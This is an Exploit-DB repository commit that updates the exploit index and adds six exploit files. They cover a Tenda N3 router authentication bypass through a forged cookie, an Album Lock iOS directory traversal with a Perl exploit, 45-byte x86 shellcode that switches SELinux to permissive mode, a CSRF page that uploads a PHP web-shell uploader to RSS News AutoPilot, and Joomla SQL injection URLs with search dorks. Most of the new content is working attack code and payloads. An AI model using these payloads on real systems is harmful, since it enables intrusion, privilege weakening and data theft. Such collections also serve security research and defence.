DB: 2017-02-21

6 new exploits

EFS Easy Chat Server - Authentication Request Buffer Overflow (SEH)
EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (SEH)

EFS Easy Chat Server - Cross-Site Request Forgery (Change Admin Password)
EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password)

EFS Easy Chat Server - Authentication Request Buffer Overflow (Perl)
EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl)

yaws 1.89 - Directory Traversal
Yaws 1.89 - Directory Traversal

Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)

Jogjacamp JProfile Gold - (id_news) SQL Injection
Jogjacamp JProfile Gold - 'id_news' Parameter SQL Injection

RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery
Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection
Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection
Album Lock 4.0 iOS - Directory Traversal
Tenda N3 Wireless N150 Home Router - Authentication Bypass

files.csv

@@ -9946,12 +9946,12 @@ id,file,description,date,author,platform,type,port
 8097,platforms/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote,0
 8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0
 8118,platforms/windows/remote/8118.html,"Orbit Downloader 2.8.4 - Long Hostname Remote Buffer Overflow",2009-02-27,JavaGuru,windows,remote,0
-8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server - Authentication Request Buffer Overflow (SEH)",2009-03-03,His0k4,windows,remote,80
+8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (SEH)",2009-03-03,His0k4,windows,remote,80
 8143,platforms/windows/remote/8143.html,"Sopcast SopCore Control - 'sopocx.ocx' Command Execution",2009-03-03,Nine:Situations:Group,windows,remote,0
 8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution",2009-03-03,Elazar,windows,remote,0
-8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,windows,remote,0
+8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,windows,remote,0
 8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote,0
-8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,windows,remote,80
+8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,windows,remote,80
 8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,windows,remote,0
 8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution",2009-03-05,Nine:Situations:Group,windows,remote,0
 8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,windows,remote,0
@@ -10443,7 +10443,7 @@ id,file,description,date,author,platform,type,port
 15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
 15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
 15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
-15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
+15371,platforms/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
 15373,platforms/windows/remote/15373.txt,"mongoose Web server 2.11 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
 15421,platforms/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,windows,remote,0
 15423,platforms/android/remote/15423.html,"Google Android 2.0 < 2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0
@@ -15899,6 +15899,7 @@ id,file,description,date,author,platform,type,port
 41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
 41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
+41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -20815,7 +20816,7 @@ id,file,description,date,author,platform,type,port
 8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion",2009-03-03,"Salvatore Fresta",php,webapps,0
 8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion",2009-03-03,d3b4g,php,webapps,0
 8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0
-8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - (id_news) SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0
+8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - 'id_news' Parameter SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0
 8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0
 8164,platforms/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps,0
 8165,platforms/php/webapps/8165.txt,"Blue Eye CMS 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps,0
@@ -37310,7 +37311,12 @@ id,file,description,date,author,platform,type,port
 41389,platforms/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
 41390,platforms/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
 41391,platforms/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
+41392,platforms/php/webapps/41392.html,"RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery",2016-08-30,"Arbin Godar",php,webapps,0
 41393,platforms/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
 41394,platforms/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps,0
 41395,platforms/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps,0
 41396,platforms/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps,0
+41399,platforms/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0
+41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0
+41401,platforms/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps,0
+41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Home Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0

platforms/hardware/webapps/41402.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Complete Authentication Bypass In Tenda N3 Wireless N150 Routers
+# Date: 03-09-2015
+# Software Link: http://tendacn.com/en/product/N150.html
+# Exploit Author: Mandeep Jadon
+# Contact: http://twitter.com/1337tr0lls
+# Website: http://twitter.com/1337tr0lls
+# CVE: CVE-2015-5995
+# Category: Device
+
+
+Description:
+
+The router (AP) is using very poor authentication mechanism . It uses a
+static cookie to verify the incoming authentication. After careful
+inspection it was found that the cookie used were same for any number of
+authentication by the Admin .
+
+Thus the cookie can be easily forged and the admin account could be
+compromised without supplying the credentials .
+
+Proof Of Concept:
+
+Inject the following cookie in the browser with the given values :
+
+admin:language : en
+
+Reload the page . You are logged into the admin account .
+
+Video POC : https://www.youtube.com/watch?v=dvF-7KK0g6E
+
+Mitigation :
+
+Use: a secure authentication mechanism consisting of random , complex
+cookies .
+
+References :
+https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5995
+https://www.kb.cert.org/vuls/id/630872

platforms/ios/webapps/41401.txt

@@ -0,0 +1,186 @@
+Document Title:
+===============
+Album Lock v4.0 iOS - Directory Traversal Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2033
+
+
+Release Date:
+=============
+2017-02-20
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2033
+
+
+Common Vulnerability Scoring System:
+====================================
+7.2
+
+
+Product & Service Introduction:
+===============================
+Do you have any secret photo and videos in your iPhone? Album Lock can protect your privacy perfectly. Album is the most 
+convenient private Photo&Video App!  You can add your SPECIAL photos&videos into AlbumLock, we provides many convenient ways. 
+From Photo App(Camera Roll), iTunes File Sharing Sync, WiFi Transfer and in App Camera.
+
+(Copy of the Homepage: https://itunes.apple.com/us/app/album-lock-lock-secret-photo/id851608952 )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official Album Lock v4.0 ios mobile application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-02-20: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A directory traversal web vulnerability has been dsicovered in the official Album Lock v4.0 iOS mobile web-application.
+The issue allows an attackers to unauthorized request and download local application files by manipulation of path parameters.
+
+The directory traversal web vulnerability is located in the `filePaht` parameter of the wifi web-server interface. Remote attackers 
+are able to request the local web-server during the sharing process to access unauthenticated application files. Attackers are able 
+to request via `getObject` image path variables to access or download files. Remote attackers are able to access the root `document` 
+path of the application. The request method to execute is GET and the attack vector is located on the client-side of the web-server 
+web-application. Finally an attacker is able to access with the credentials the service by using a client via http protocol.
+
+The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2. 
+Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the 
+vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] getObject
+
+Vulnerable Parameter(s):
+[+] filePaht
+
+Affected Module(s):
+[+] Web-Server File System
+
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Standard Request:
+http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images/fhhjjj/picture-00001.png
+
+
+PoC: Payload
+/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
+
+
+Malicious Request: Exploitation
+http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/
+http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/
+http://localhost:8880/getImage?filePaht=/var/mobile/
+
+
+PoC: Exploit
+use strict;
+use LWP::UserAgent;
+my $b = LWP::UserAgent->new();
+my $host = "1.1.1.1:5555";
+print $b->get("http://".$host."/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/config.dat")->content;
+
+
+--- PoC Session Logs [GET] ---
+Status: 200[OK]
+GET http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application 
+Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8880]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
+      Accept[*/*]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Referer[http://localhost:8880/list_gif.html?folder=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+
+
+Reference(s):
+http://localhost:8880/
+http://localhost:8880/getImage
+http://localhost:8880/getImage?filePaht=
+http://localhost:8880/list_gif.html
+http://localhost:8880/list_gif.html?folder=
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patch by disallowing the filepaht parameter to request upper local paths outside the document folder.
+Include a whitelist of allowed requested path and setup a secure exception to prevent on exploitation.
+
+
+Security Risk:
+==============
+The security risk of the directory traversal web vulnerability in the mobile application is estimated as high. (CVSS 7.2)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
+Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
+Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
+
+Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
+of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
+
+				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+
+

platforms/lin_x86/shellcode/41403.c

@@ -0,0 +1,80 @@
+# Title: x86 SELinux change between permissive and enforcing modes shellcode
+# Date: 20-02-2017
+# Author: Krzysztof Przybylski
+# Platform: Lin_x86
+# Tested on: CentOS 6.8 (i686)
+# Shellcode Size: 45 bytes
+# ID: SLAE - 871
+/*
+
+1. Description:
+
+SELinux mode switcher. Permissive = "\x30"; Enforcing = "\x31"
+gcc -fno-stack-protector -z execstack SELinux-mode.c -o SELinux-mode
+
+2. Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060:	6a 0b                	push   0xb
+ 8048062:	58                   	pop    eax
+ 8048063:	31 d2                	xor    edx,edx
+ 8048065:	52                   	push   edx
+ 8048066:	6a 30                	push   0x30
+ 8048068:	89 e1                	mov    ecx,esp
+ 804806a:	52                   	push   edx
+ 804806b:	68 6f 72 63 65       	push   0x6563726f
+ 8048070:	68 74 65 6e 66       	push   0x666e6574
+ 8048075:	68 6e 2f 73 65       	push   0x65732f6e
+ 804807a:	68 2f 73 62 69       	push   0x6962732f
+ 804807f:	68 2f 75 73 72       	push   0x7273752f
+ 8048084:	89 e3                	mov    ebx,esp
+ 8048086:	52                   	push   edx
+ 8048087:	51                   	push   ecx
+ 8048088:	53                   	push   ebx
+ 8048089:	89 e1                	mov    ecx,esp
+ 804808b:	cd 80                	int    0x80
+
+3. Code
+
+global _start			
+section .text
+_start:
+	push 0xb	
+        pop eax
+	xor edx, edx
+	push edx
+	push byte 0x30
+	mov ecx, esp
+	push edx
+	push 0x6563726f
+	push 0x666e6574
+	push 0x65732f6e
+	push 0x6962732f
+	push 0x7273752f
+	mov ebx, esp
+	push edx
+	push ecx
+	push ebx
+	mov ecx, esp
+	int 0x80
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x6a\x0b\x58\x31\xd2\x52\x6a"
+"\x30"
+"\x89\xe1\x52\x68\x6f\x72\x63\x65"
+"\x68\x74\x65\x6e\x66\x68\x6e\x2f"
+"\x73\x65\x68\x2f\x73\x62\x69\x68"
+"\x2f\x75\x73\x72\x89\xe3\x52\x51"
+"\x53\x89\xe1\xcd\x80";
+
+main()
+{
+        printf("Shellcode Length:  %d\n", strlen(code));
+        int (*ret)() = (int(*)())code;
+        ret();
+}
+

platforms/php/webapps/41392.html

@@ -0,0 +1,112 @@
+# Exploit Title: RSS News AutoPilot Script 1.0.1 / 3.0.3 - CSRF to
+Persistent XSS and RCE Through Unrestricted File Upload
+# Date: 30 August 2016
+# Exploit Author: Arbin Godar
+# Website : ArbinGodar.com
+# Software Link: https://codecanyon.net/item/rss-news-autopilot-script/11812898
+# Version: 1.0.1 to 3.0.3
+
+----------------------------------------------------------------------------------------------------------------------
+
+RSS News AutoPilot Script File:
+http://www.mediafire.com/file/6dmegm8ak1jv2u1/rss.zip
+
+Description:
+An Attackers are able to execute js and php code on web
+application using RSS News - AutoPilot Script which allow an attacker to
+create a post when an authenticated user/admin browses a special
+crafted web page. Also, all the process was possible without any
+authenticated user/admin for more info watch the below PoC Video.
+
+The title parameter was not filtering special characters mean
+vulnerable to XSS and while uploading image they weren't filtering the file
+type mean vulnerable to unrestricted file upload. So, now by creating CSRF
+exploit code for posting
+an article with XSS alert JS payload as title of post and php file as a
+image. Now if the
+attacker is able to perform CSRF attack sucessfully then XSS will be
+triggered and we can execute php code too.
+
+PoC Video: https://youtu.be/znDgv8K0yFk
+
+CSRF Exploit Code:
+
+ <html>
+  <body>
+   <title>[RSS News - AutoPilot Script] CSRF to Persistent XSS and
+RCE</title>
+ <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://localhost/news.php?case=add", true);
+        xhr.setRequestHeader("Accept",
+"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data;
+boundary=---------------------------2331884730649");
+        xhr.withCredentials = true;
+        var body = "-----------------------------2331884730649\r\n" +
+          "Content-Disposition: form-data; name=\"title\"\r\n" +
+          "\r\n" +
+          "Test\r\n" +
+          "-----------------------------2331884730649\r\n" +
+          "Content-Disposition: form-data; name=\"category_id\"\r\n" +
+          "\r\n" +
+          "1\r\n" +
+          "-----------------------------2331884730649\r\n" +
+          "Content-Disposition: form-data; name=\"thumbnail\";
+filename=\"lod.php\"\r\n" +
+          "Content-Type: application/octet-stream\r\n" +
+          "\r\n" +
+          "\x3c?php echo \'\x3cform action=\"\" method=\"post\"
+enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"\x3e\';
+echo \'\x3cinput type=\"file\" name=\"file\" size=\"50\"\x3e\x3cinput
+name=\"_upl\" type=\"submit\" id=\"_upl\"
+value=\"Upload\"\x3e\x3c/form\x3e\'; if( $_POST[\'_upl\'] == \"Upload\" ) {
+if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) {
+echo \'\x3cb\x3eUpload Sukses!!!\x3cb\x3e\x3cbr\x3e\x3cbr\x3e\'; } else {
+echo \'\x3cb\x3eGagal Upload!!!\x3c/b\x3e\x3cbr\x3e\x3cbr\x3e\'; } } ?\x3e
+\r\n" +
+          "\r\n" +
+          "-----------------------------2331884730649\r\n" +
+          "Content-Disposition: form-data; name=\"details\"\r\n" +
+          "\r\n" +
+          "\x3cp\x3etest\x3c/p\x3e\r\n" +
+          "-----------------------------2331884730649\r\n" +
+          "Content-Disposition: form-data; name=\"published\"\r\n" +
+          "\r\n" +
+          "1\r\n" +
+          "-----------------------------2331884730649\r\n" +
+          "Content-Disposition: form-data; name=\"submit\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------2331884730649--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <br><br><br>
+    <center>
+    <h2><font color="red">[RSS News - AutoPilot Script] CSRF to Persistent
+XSS and RCE</font></h2>
+    <form action="#">
+      <input type="button" value="Submit request"
+onclick="submitRequest();" />
+    </form>
+  </center>
+  </body>
+</html>
+
+Vendor Shouted Urgent Update:
+http://wpsup.com/products/rss-news-script/urgent-update-fix-security-bugs/
+
+Fix/Patch: Update to latest version.
+
+----------------------------------------------------------------------------------------------------------------------
+
+Regards,
+Arbin Godar
+https://twitter.com/arbingodar

platforms/php/webapps/41399.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component MaQma Helpdesk v4.2.7 - SQL Injection
+# Google Dork: inurl:index.php?option=com_maqmahelpdesk
+# Date: 20.02.2017
+# Vendor Homepage: http://componentslab.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/maqma-helpdesk/
+# Demo: http://demo.componentslab.com/index.php/department/software-support
+# Version: 4.2.7
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_maqmahelpdesk&task=pdf_kb&id=[SQL]
+# # # # #

platforms/php/webapps/41400.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Joomla! Component PayPal IPN for DOCman v3.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_docmanpaypal
+# Date: 20.02.2017
+# Vendor Homepage: http://shopfiles.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/docman-extensions/paypal-ipn-for-docman/
+# Demo: http://demo.shopfiles.com/index.php/paypal-ipn-for-docman
+# Version: 3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_docmanpaypal&task=addToCart&id=[SQL]
+# # # # #
+